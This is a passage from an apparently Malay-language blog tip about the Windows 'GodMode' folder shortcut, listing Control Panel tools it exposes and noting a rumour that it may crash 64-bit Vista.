    Jika folder tersebut bertukar kepada icon seperti control panel, bermakna anda
    telah berjaya melakukannya.

    Tetapi khabar angin turut mengatakan bahawa bagi sistem operasi Vista, hanya 32bit sahaja yang menjadi manakala bagi 64bit, ia mampu untuk "crash" kan sistem anda malah mampu bertukar menjadi Bluescreen Of Dead. Rujuk di halaman ini.

    Antara aplikasi yang dapat diakses di dalam fungsi GodMode ini ialah

    Action Center
    Admistrative Tool
    Auto Play
    Backup And Restore
    BitLocker Drive And Encyption
    Colour Managament
    Credential Manager
    Date And Time
    Default Programs
    Destop Gadget
    Device And Manager
    Device And Printer

    Dan kesemua fungsi-fungsi lain yang ada di dalam Window .

    credit : malaysian hackerz , wahidie DC king II